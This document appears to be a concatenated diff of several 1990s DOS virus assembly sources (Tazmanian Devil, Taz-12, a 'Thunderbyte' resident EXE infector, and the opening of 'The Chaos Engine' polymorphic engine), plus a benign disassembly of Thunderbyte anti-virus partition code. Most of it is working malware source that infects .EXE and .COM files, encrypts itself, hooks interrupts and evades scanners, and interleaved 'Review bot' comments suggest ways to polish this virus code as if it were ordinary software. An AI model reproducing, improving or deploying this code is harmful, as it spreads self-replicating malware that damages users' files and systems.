virus_msg16 db cr,lf,"ADH ADH ADH ADHÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜH ADH ADH ADH ADH AHD ADH$"
virus_msg17 db cr,lf,"ADH ADH ADH ADßÛÛÛÛÛßßß ADH ßßÛÛÛÛÛÛÛÛHßÛÛÛÛÛÛÜ ADH ADH ADH ADH ADH ADH$"
virus_msg18 db cr,lf,"ADH ÜÜÛÛÛÜÜ ADH ßÛÛÛÛÜH ADH ADßßßßßßßDH ÜÛÛÛÛÛÛÛADH ADH ADH ADH ADH ADH$"
virus_msg19 db cr,lf,"ADÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜADH ADH ADH AÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜDH ADH ADH ADH$"
virus_msg20 db cr,lf,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛDH ADH ADH ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ ADH ADH ADH$"
virus_msg21 db cr,lf,"AÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßßADH ADH ADH ADHßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ ADH ADH ADH$"
virus_msg22 db cr,lf,"ADßß ßÛÛÛÛÛßßßßßßDH ADH ADH ADH ADH ADH ADßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ ADH ADH ADH$"
virus_msg23 db cr,lf,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector$"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,2 ; Are at least 6 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
mov dx,offset virus_msg5
int 21h
mov dx,offset virus_msg6
int 21h
mov dx,offset virus_msg7
int 21h
mov dx,offset virus_msg8
int 21h
mov dx,offset virus_msg9
int 21h
mov dx,offset virus_msg10
int 21h
mov dx,offset virus_msg11
int 21h
mov dx,offset virus_msg12
int 21h
mov dx,offset virus_msg13
int 21h
mov dx,offset virus_msg14
int 21h
mov dx,offset virus_msg15
int 21h
mov dx,offset virus_msg16
int 21h
mov dx,offset virus_msg17
int 21h
mov dx,offset virus_msg18
int 21h
mov dx,offset virus_msg19
int 21h
mov dx,offset virus_msg20
int 21h
mov dx,offset virus_msg21
int 21h
mov dx,offset virus_msg22
int 21h
mov dx,offset virus_msg23
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
main endp
code ends
end main
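Review bot: The comment on the `files_found` check in `exit_virus` says "at least 6 files" while the code compares against 2; the number in the comment is stale and should match the operand (`; Are at least 2 files infected?`). `close_file` repeats the swapped stamp comments from the previous file: for AH=57h AL=01, CX is the time and DX the date, so `mov cx,orig_time ; Get the time stamp` and `mov dx,orig_date ; Get the date stamp`. The `filler` line claims to "pad out the file length to 666 bytes" while `virus_size equ 2276`; since `virus_size` drives both the write length in `infect_file` and the loop bound in `encrypt_decrypt`, the comment should state the real padded length rather than a figure copied from another build.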

@ -0,0 +1,252 @@
cseg segment byte public 'code'
assume cs:cseg, ds:cseg
org 100h
start_of_virus:
call get_offset
get_offset: ;alternative way to get the delta
mov di,sp ;offset without activating any flags in
mov bp,word ptr ss:[di] ;TB-scan
sub bp,offset get_offset
inc sp
inc sp
push ds ;save es & ds
push es
push cs ;and point ds to code segment
pop ds
call encrypt_decrypt ;decrypt contents of file
start_of_encryption:
cld ;clear direction flag
mov ah,1ah ;set new dta area
lea dx,[bp+dta_area]
int 21h
mov bx,es
push cs ;es points to code segment
pop es
lea si,[bp+return2_buffer] ;this code prepares the return code
lea di,[bp+return_buffer]
movsw ;transfer buffer contents
lodsw
add ax,bx ;bx holds start es = psp
add ax,10h
stosw
; lea di,[bp+stack_return]
; lea si,[bp+stack_save] ;si already points to stack_save
add di,8 ;saving a byte with this code
lodsw ;prepares the restore of ss/sp
add ax,bx
add ax,10h
stosw
movsw
mov ah,47h ;save starting directory
xor dl,dl
lea si,[bp+save_dir]
int 21h
find_new_files: ;start finding files
mov ah,4eh
mov cx,7
lea dx,[bp+search_pattern]
find_files:
int 21h
jnc open_file ;if found a file
lea dx,[bp+dir_mask] ;else change directory
mov ah,3bh
int 21h
jnc find_new_files
jmp no_more_files ;end of all files
open_file: ;open the found file
mov ax,3d02h
lea dx,[bp+dta_area+1eh]
int 21h
xchg ax,bx ;file handle in bx
mov ah,3fh ;read the exe header to exe_header
mov cx,18h
lea dx,[bp+exe_header]
int 21h
lea si,[bp+exe_header] ;check if it's really a executable
lodsw
cmp ax,'ZM'
je check_infected
cmp ax,'MZ'
je check_infected
jmp no_exe ;else jump
check_infected:
add si,10h ;saving another byte
; lea si,[bp+exe_header+12h]
lodsw
cmp ax,'Ri' ;is it already infected?
jne start_infect
jmp already_infected
start_infect:
lea di,[bp+return2_buffer] ;put the files ip/cs in return2_buffer
movsw
movsw
lea si,[bp+exe_header+0eh] ;save the files ss/sp in stack_save
movsw
movsw
lea di,[bp+exe_header+12h] ;mark the file infected
mov ax,'Ri'
stosw
mov al,2 ;go to end_of_file
call go_eof ;dx/ax is file length at return
mov cx,10h ;use div to save bytes instead of speed
div cx
sub ax,word ptr ds:[bp+exe_header+8]
xchg dx,ax
stosw ;put new ip/cs in exe_header
xchg dx,ax
stosw
inc ax ;put new suitable ss/sp in exe_header
inc ax
mov word ptr [bp+exe_header+0eh],ax
mov word ptr [bp+exe_header+10h],4b0h
mov ah,2ch ;get system time for random number
int 21h
xor dh,dh ;just alter the code a little bit
or dl,00001010b ;with encryption so TB-scan wont't
mov word ptr [bp+encryption_value],dx ;find garbage instruction
mov ah,40h ;prepare to append virus to file
lea dx,[bp+start_of_virus]
call append_virus ;call it
mov al,2 ;go to end of file
call go_eof
mov cx,512 ;get filesize in 512 modules
div cx
inc ax
mov word ptr [bp+exe_header+2],dx ;put modulo/filesize in
mov word ptr [bp+exe_header+4],ax ;exe header
xor al,al ;go to beginning of file
call go_eof
mov ah,40h ;write new exe header
mov cx,18h
lea dx,[bp+exe_header]
int 21h
lea si,[bp+dta_area+16h] ;restore time/date stamp
mov cx,word ptr [si]
mov dx,word ptr [si+2]
mov ax,5701h
int 21h
already_infected:
no_exe:
mov ah,3eh ;close file
int 21h
mov ax,4301h ;restore file attribute
mov cl,byte ptr [bp+dta_area+15h]
lea dx,[bp+dta_area+1eh]
int 21h
mov ah,4fh ;find next file
jmp find_files
no_more_files:
lea dx,[bp+save_dir] ;restore starting directory
mov ah,3bh
int 21h
pop es ;shrink memory block
mov ah,4ah
mov bx,10000
int 21h
push es
mov ah,48h ;allocate a new 3k block
mov bx,192
int 21h
jc no_mem
dec ax
mov es,ax
mov word ptr es:[1],0008h ;mark DOS as owner and it will
no_mem: ;reduce available memory to DOS
pop es ;restore old es/ds
pop ds
cli ;must use this before altering ss/sp
mov ss,word ptr cs:[bp+stack_return] ;put back original ss/sp
mov sp,word ptr cs:[bp+stack_return+2]
sti ;interrupts allowed again
end_part:
db 0eah ;jmp to original ip
return_buffer db 0,0,0,0
return2_buffer dw 0,0fff0h ;code for carrier file to exit
stack_save dd ?
stack_return dd ?
dir_mask db '..',0
search_pattern db '*.exe',0
signature db "Taz-12 (C) 94 by Sector Infector!"
go_eof: ;procedure to go to beginning and
mov ah,42h ;end of file
xor cx,cx ;this saves a few bytes as it's
cwd ;used a few times
int 21h
ret
end_of_encryption:
pad db 0 ;pad out a byte so first byte of
;encryption value won't be overwritten
encryption_value dw 0
encrypt_decrypt: ;cryptation routine
mov si,word ptr [bp+encryption_value]
lea di,[bp+start_of_encryption]
mov cx,(end_of_encryption-start_of_encryption+1)/2
crypt_loop:
xor word ptr [di],si
inc di
inc di
loop crypt_loop
ret
append_virus:
call encrypt_decrypt ;encrypt virus before write
mov cx,end_of_virus-start_of_virus ;cx is length of virus
int 21h ;call 40h
call encrypt_decrypt ;decrypt virus again
ret
end_of_virus:
exe_header db 18h dup(?) ;don't need to copy this shit
dta_area db 43 dup(?) ;to the next file to infect
save_dir db 64 dup(?) ;return adress is already saved!
cseg ends
end start_of_virus
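Review bot: The encryption boundaries are not documented where the labels are, although they are the most useful fact for anyone reading or scanning this listing: `encrypt_decrypt` only XORs `start_of_encryption`..`end_of_encryption`, so the delta-offset prologue at `start_of_virus`/`get_offset`, the `encryption_value` word, and the `encrypt_decrypt`/`append_virus` routines are stored in every host in the clear. A comment at `start_of_encryption` such as `; only this range up to end_of_encryption is stored XOR'd with encryption_value; the code before and after it is never encrypted` would make that explicit. The commented-out `lea` lines in `start_infect` and `check_infected` depend on `si`/`di` being exactly where the preceding `movsw`/`lodsw` left them, and their "saving a byte" comments say what was removed rather than which register value is being reused; a note like `; si still points at exe_header+2 after the signature lodsw` documents the invariant the shortcut relies on. The `'Ri'` word written at EXE-header offset 12h is also the reinfection marker tested in `check_infected`, which the `; mark the file infected` comment does not say.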

@ -0,0 +1,171 @@
;This is a disassembly of Thunderbyte's anti-viral partition code.
;An org statement was not used because it appears that all offsets used
;herein are either relative or absolute, i.e. it just doesn't matter.
;This should be compiled as a binary image file, it *WILL NOT* create
;an executable file. This code is exactly 512 bytes long and should be
;implanted into the hard drive at physical sector 1, cylinder 0, head 0
;using the BIOS direct write to disk function. *DO NOT* use DOS write to
;disk functions or DEBUG because these functions can't access hidden sectors
;and you'll probably just overwrite the disk drive.
;have fun, folks!
code_start:
cli ;no interrupts
xor cx, cx
mov ss, cx
mov sp, 7c00h
mov si, sp
sti
cld
mov es, cx ;cs already equals 0
mov ds, cx
mov di, 0600h ;
mov ch, 01 ;cx = 100h
repz movsw ;mov 200h bytes from 0000:7c00h to 0000:0600h
;to make room for boot sector
jump_pt db 0e9h, 00, 8ah ;this will act like far jmp to first_pt label
;i.e. 0000:061ah, wraps around segment
first_pt: ;when execution continues, this will be offset
;061ah here
mov si, 06ddh
call routine_1
mov si, 07eeh
call routine_2
mov bp, si
mov si, 0733h
jb second_pt
mov bx, sp ;buffer at stack pointer (7c00h?)
mov ax, 0201h ;func 2, 1 sector - possibily boot sector?
int 13h ;BIOS read sector
mov si, 0725h
second_pt:
jb sixth_pt
mov si, 745h
call routine_1
call routine_1
mov si, 7c40h
mov cx, 01c0h
loop_1:
xchg ax, bx
shl bx, 1
lodsb ;from 0000:7c40h
add ax, bx
mov ah, bh
test ah, ah
jns third_pt
xor ax, 0a097h
third_pt:
loop loop_1
cmp ax, 7805h
jnz fourth_pt
mov si, 0740h
call routine_1
mov si, 0762h
call 01cdh
mov dx, [si + 0fc9fh]
cmp dx, 27eh
jb fourth_pt
mov si, 740h
call routine_1
mov si, 774h
call routine_1
les ax, [004c]
mov bx, es
mov cl, 04
shr ax, cl
add ax, bx
inc cx
inc cx
shl dx, cl
cmp ax, dx
jnb fifth_pt
fourth_pt:
mov si, 0787h
call routine_1
int 16h
mov si, 783h
or al, 20h
cmp al, 79h
jnz seventh_pt
fifth_pt:
call routine_1
mov si, bp
mov dx, [si]
jmp sp ;control goes to boot sector
sixth_pt:
call routine_1
int 16h
seventh_pt:
int 18h ;rom BASIC!
eighth_pt:
jmp eighth_pt ;infinite loop Lock Up!
routine_2:
lea di, [si - 30h]
boot_chk:
cmp byte ptr [si], 80h ;looks like check for bootable parttn
jz bootable
sub si, 10h
cmp si, di
jnb boot_chk
ret
bootable:
mov dx, [si]
mov cx, [si + 2]
return_pt:
ret
routine_1:
lodsb
cbw ;convert to word
test ax, ax ;huh?
jz return_pt ;like ret to original caller
mov ah, 0eh
xor bx, bx
push si
int 10h
pop si
jmp routine_1
code_end:
msg1 db 13, 10, "Thunderbyte anti-virus partition "
db "v6.24 (C) 1993-94 Thunderbyte BV.", 13, 10, 10, 0
msg2 db "Disk error!", 13, 10, 00
msg3 db "No system!", 13, 10, 00
msg4 db "OK!", 13, 10,"Checking ",0
msg5 db "bootsector CRC -> ",0
msg6 db "available RAM -> ",0
msg7 db "INT 13h -> ",0
msg8 db "OK!",13, 10, 10, 0
msg9 db "Failed!", 13, 10, "System might be infected. Continue? (N/Y)", 07, 0
misc db 0, 0, 0, 80h, 01h, 01, 0, 06, 0dh, 0feh, 0f8h
db 03eh, 0, 0, 0, 06h, 78h, 0dh, 0, 0, 0
db 10h dup(0)
db 10h dup(0)
db 0eh dup(0)
id_sig db 55h, 0aah
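Review bot: `call 01cdh` in the checksum path is the one call in this disassembly left as a raw absolute target while every other call is resolved to `routine_1` or `routine_2`; presumably it is `routine_1` at its post-relocation address, which should be confirmed and written as the label so the listing agrees with its own header note that offsets are relative or absolute and do not matter. The `;huh?` on `test ax, ax` in `routine_1` can state what the check is: after `cbw`, `ax` is zero only for the NUL byte, so `jz return_pt` is the end-of-string exit of the print loop (`; NUL terminator reached - end of string`). The displacement in `mov dx, [si + 0fc9fh]` is a negative offset printed as an unsigned word; annotating it as `; = [si - 361h]` saves the next reader the arithmetic.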

@ -0,0 +1,612 @@
;*****************************************************************************;
; ;
; Tunderbyte Virus ;
; ;
; TBSCAN.DAT : DB3F00807609??4D75F9 ;
; ;
;*****************************************************************************;
virus segment public 'code'
assume cs:virus, ds:virus, es:virus
org 0
VirusStart equ $
VirusSize1 equ (VirusEnd1-$)
VirusSize2 equ (VirusEnd2-$)
Decrypt1: db 0bdh,StartEncrypt-Decrypt2,0
db 80h,76h,Decrypt2-VirusStart-1,0
db 4dh,75h,-7
Decrypt2: cli
mov sp,offset DoAgain-2
ret -8
db 0,0,0,0,'***** THUNDERBYTE *****',0,0,0,0
Init: mov cx,(VirusEnd1-StartEncrypt+1)/2
mov dl,byte ptr cs:Decrypt1[6]
mov dh,dl
mov si,offset StartEncrypt
NotReady: ret 2
DecryptWord: mov ax,ss:[si]
xor cs:[si],dx
NextWord: add dx,ax
inc si
ret -4
dw DecryptWord
dw DoAgain
dw NextWord
dw Init
DoAgain: loop NotReady
StartEncrypt equ $
Main: mov sp,1000h
sti
push ds
push es
mov ax,03031h
mov bx,0DEADh
int 21h
cmp ax,0DEADh
jne Install
jmp Exit
Install: push es
mov ah,52h
int 21h
mov ax,es:[bx-2]
mov cs:FirstMCB,ax
pop es
CheckBlock: mov ds,ax
inc ax
cmp word ptr ds:[1],ax
jne NextBlock
cmp word ptr ds:[3],((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
jne NextBlock
push ax
push es
mov cx,VirusSize2
xor di,di
mov es,ax
mov al,es:[di]
cld
repe scasb
pop es
pop ax
je CopyVirus
NextBlock: add ax,ds:[3]
cmp byte ptr ds:[0],'Z'
jne CheckBlock
mov ah,4ah
mov bx,-1
int 21h
mov ah,4ah
sub bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)+1
int 21h
mov ah,48h
mov bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
int 21h
CopyVirus: push cs
pop ds
dec ax
mov es,ax
inc ax
mov es:[1],ax
mov cx,8
mov si,offset CommandStr
mov di,cx
cld
rep movsb
mov es,ax
EncryptZero: inc byte ptr ds:Decrypt1[6]
jz EncryptZero
mov cx,VirusSize2
xor si,si
xor di,di
cld
rep movsb
push es
call ReturnFar
xor ax,ax
mov ds,ax
cli
mov ax,offset DebugWatch
xchg ax,ds:[20h]
mov cs:OldInt8o,ax
mov ax,cs
xchg ax,ds:[22h]
mov cs:OldInt8s,ax
sti
push ds:[4]
push ds:[6]
mov word ptr ds:[4],offset Trace1
mov word ptr ds:[6],cs
pushf
push cs
mov ax,offset Return4
push ax
cli
pushf
pop ax
or ax,100h
push ax
push ds:[86h]
push ds:[84h]
mov ah,52h
Trace1: push bp
mov bp,sp
push ax
push ds
push cs
pop ds
mov ax,FirstMCB
cmp [bp+4],ax
jae Return1
mov ax,[bp-2]
mov RegAX,ax
mov RegSP,bp
mov ax,[bp+2]
mov OldInt21o,ax
mov ax,[bp+4]
mov OldInt21s,ax
xor ax,ax
mov ds,ax
mov word ptr ds:[4],offset Trace2
mov word ptr ds:[6],cs
jmp short Trace3
Return1: jmp short Return3
Trace2: push bp
mov bp,sp
push ax
push ds
cmp ax,cs:RegAX
jne Return3
cmp bp,cs:RegSP
jne Return3
Trace3: push bx
push dx
lds bx,[bp+2]
mov al,[bx]
mov dx,[bx+1]
inc dx
cmp al,0e9h
je JumpOpcode
cmp al,0e8h
je CallOpcode
xchg ax,dx
dec ax
cbw
xchg ax,dx
cmp al,0ebh
je JumpOpcode
cmp al,70h
jb Return2
cmp al,7fh
ja Return2
JumpOpcode: push ax
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[0c8h],offset HackJump
mov word ptr ds:[0cah],cs
jmp short Continue
CallOpcode: push ax
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[0c8h],offset HackCall
mov word ptr ds:[0cah],cs
Continue: pop ds
pop ax
mov cs:Displacement,dx
mov cs:Opcode,al
mov ax,32cdh
xchg ax,[bx]
mov cs:SavedCode,ax
mov cs:HackOffset,bx
mov cs:HackSegment,ds
and word ptr [bp+6],0feffh
Return2: pop dx
pop bx
Return3: pop ds
pop ax
pop bp
iret
Return4: pop ds:[6]
pop ds:[4]
mov cs:Handle,0
Exit: pop es
pop ds
mov ax,ds
add ax,10h
add cs:OldCS,ax
add ax,cs:OldSP
mov dx,cs:OldSP
cli
mov ss,ax
mov sp,dx
sti
jmp cs:OldEntry
ReturnFar: retf
OldEntry equ this dword
OldIP dw 0
OldCS dw -10h
OldSP dw 1000h
OldSS dw 0
HackAddress equ this dword
HackOffset dw ?
HackSegment dw ?
SavedCode dw ?
HackJump: call Interrupt21
push bp ; simulate a conditional or
push ax ; unconditional jump
mov bp,sp
mov ax,[bp+8]
and ax,0fcffh
push ax
db 0b8h ; mov ax,????
Displacement dw 0
popf
Opcode db 0ebh,3,0 ; j?? +3
xor ax,ax
nop
add [bp+4],ax
pop ax
pop bp
iret
HackCall: call Interrupt21
sub sp,2 ; simulate a call
push bp
mov bp,sp
push ax
mov ax,[bp+4]
inc ax
xchg ax,[bp+8]
xchg ax,[bp+6]
xchg ax,[bp+4]
add ax,cs:Displacement
mov [bp+2],ax
pop ax
pop bp
iret
Seek: mov ah,42h
xor cx,cx
xor dx,dx
Dos: pushf
db 9ah
OldInt21o dw ?
OldInt21s dw ?
ret
DosVersion: cmp ax,3031h
jne NotTByte
cmp bx,0DEADh
jne NotTByte
mov ax,0DEADh
add sp,8
iret
Interrupt21: cmp ah,30h
je DosVersion
push si
push ds
push cs:SavedCode
lds si,cs:HackAddress
pop ds:[si]
pop ds
pop si
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
cmp ah,3eh
je CloseFile
cmp ah,40h
je WriteFile
Old21: pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
push si
push ds
lds si,cs:HackAddress
mov word ptr ds:[si],32cdh
pop ds
pop si
NotTByte: ret
WriteFile: mov ax,4400h
call Dos
cmp dl,7fh
ja Error1
mov al,1
call Seek
jc Error1
or dx,dx
jnz Error1
cmp ax,17h
ja Error1
push cs
pop es
mov si,dx
mov di,offset Signature
add di,ax
cmp word ptr [si],"ZM"
jne Error1
cmp word ptr [si+12h],0DEADh
je Error1
cmp cx,18h
jb CheckHandle
or ax,ax
jz Ok
CheckHandle: cmp bx,cs:Handle
jne Error1
Ok: add cx,ax
cmp cx,18h
jbe CountOk
mov cx,18h
CountOk: sub cx,ax
jbe Error1
cld
rep movsb
mov cs:Handle,bx
Error1: jmp Old21
CloseFile: push cs
pop ds
push cs
pop es
mov ax,4400h
call Dos
test dl,80h
jne Error1
or bx,bx
je Read
cmp cs:Handle,bx
je DoNotRead
Read: xor al,al
call Seek
jc Error1
mov ah,3fh
mov cx,18h
mov dx,offset Signature
call Dos
jc Error1
DoNotRead: mov cs:Handle,0
cmp Signature,"ZM"
jne Error1
cmp ChkSum,0DEADh
je Error1
mov ax,ExeIP
mov OldIP,ax
mov ax,ExeCS
mov OldCS,ax
mov ax,ExeSS
mov OldSS,ax
mov ax,ExeSP
mov OldSP,ax
mov al,2
call Seek
jc Error1
push ax
push dx
mov cx,200h
div cx
cmp PartPage,dx
jne SizeError
add dx,-1
adc ax,0
cmp PageCount,ax
SizeError: pop dx
pop ax
jne Error2
add ax,0fh
adc dx,0
and ax,0fff0h
mov cx,dx
mov dx,ax
mov ax,4200h
call Dos
jnc SeekOk
Error2: jmp Old21
SeekOk: mov cx,10h
div cx
sub ax,HdrSize
mov ExeCS,ax
mov ExeIP,offset Decrypt1
mov ExeSS,ax
mov ExeSP,VirusSize1+400h
cmp MinMem,40h
jae MemoryOk
mov MinMem,40h
cmp MaxMem,40h
jae MemoryOk
mov MaxMem,40h
MemoryOk: push ds
push es
mov ax,cs
mov ds,ax
add ax,(VirusSize2+0fh)/10h
mov es,ax
mov cx,VirusSize1
xor si,si
xor di,di
cld
rep movsb
mov ds,ax
mov cx,offset StartEncrypt-Decrypt2
mov dl,byte ptr ds:Decrypt1[6]
mov si,offset StartEncrypt-1
Again1: xor ds:[si],dl
dec si
loop Again1
mov cx,(VirusEnd1-StartEncrypt+1)/2
mov dh,dl
mov si,offset StartEncrypt
Again2: xor ds:[si],dx
mov ax,ds:[si]
add dx,ax
inc si
add dx,ax
inc si
loop Again2
mov ah,40h
mov cx,VirusSize1
xor dx,dx
call Dos
pop ds
pop es
jc Error3
mov al,2
call Seek
jc Error3
mov cx,200h
div cx
mov PartPage,dx
add dx,-1
adc ax,0
mov PageCount,ax
mov ChkSum,0DEADh
xor al,al
call Seek
jc Error3
mov ah,40h
mov cx,18h
mov dx,offset Signature
call Dos
Error3: jmp Old21
Count dw 8
DebugStr db 'DEBUG'
CommandStr db 'COMMAND '
DebugWatch: push ax
push cx
push dx
push si
push di
push ds
push es
dec cs:Count
jnz EndWatch
mov cs:Count,8
mov ax,0b000h
mov ds,ax
mov cx,2
push cs
pop es
cld
NextScreen: push cx
mov cx,2000
xor si,si
mov di,offset DebugStr
NextChar1: mov dx,5
NextChar2: lodsb
inc si
and al,0dfh
scasb
jne CharOk
dec dx
jnz NextChar2
Alarm: pop cx
lds si,cs:HackAddress
cmp byte ptr ds:[si],0cdh
jne EndWatch
mov ax,cs:SavedCode
mov ds:[si],ax
xor cx,cx
mov ds,cx
mov ax,cs:OldInt8o
mov ds:[20h],ax
mov ax,cs:OldInt8s
mov ds:[22h],ax
mov es,cx
push cs
pop ds
mov cx,14
mov si,offset EndWatch-2
mov di,4f0h
push es
push di
rep movsb
xor di,di
mov cx,VirusSize2
push cs
pop es
retf
CharOk: neg dx
add dx,5
sbb di,dx
sub si,dx
sub si,dx
loop NextChar1
ScreenOk: mov ax,ds
add ax,800h
mov ds,ax
pop cx
loop NextScreen
jmp short EndWatch
rep stosb
EndWatch: pop es
pop ds
pop di
pop si
pop dx
pop cx
pop ax
db 0eah
OldInt8o dw ?
OldInt8s dw ?
db '***** (C) COPYRIGHT 1992 BY THE WRITER *****'
VirusEnd1 equ $
FirstMCB dw ?
RegAX dw ?
RegSP dw ?
Handle dw ?
Signature dw ?
PartPage dw ?
PageCount dw ?
ReloCnt dw ?
HdrSize dw ?
MinMem dw ?
MaxMem dw ?
ExeSS dw ?
ExeSP dw ?
ChkSum dw ?
ExeIP dw ?
ExeCS dw ?
VirusEnd2 equ $
virus ends
end Main

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;

@ -0,0 +1,862 @@
radix 16
;*****************************************
;* T.H.E - C.H.A.O.S - E.N.G.I.N.E - 0.4 *
;*****************************************
;1995 - Sepultura - Australia
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;on CALLing of TCE -
;;;AX = TCE Flags:1 - Pad To DECRYPTOR_LENGTH.
;;; 2 - Make Short Decryptor (No Junk).
;;; 4 - Add Segment Overide.
;;;
;;;CX = Length of Code to Encrypt.
;;;DX = Delta Offset.
;;;DS:SI = Code to encrypt (DS _MUST_ = CS).
;;;ES:DI = Location of Buffer to Create Decryptor in.
;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;ON RETURN:
;;;ES = DS = Segment of Decryptor / Encrypted Code
;;;DX = Pointer to Start of Code
;;;CX = Length of Code
;;;;;;;;;;;;;;;;;;;
;;;Flag EQUates
MAKE_SMALL equ 1
PAD_TO_MAX equ 2
ADD_SEG equ 4
;;;;;;;;;;;;;;;;;;;
;;;W.H.A.T.E.V.E.R
DECRYPTOR_LENGTH equ 190h
MAX_PADDING equ 90h - 1f
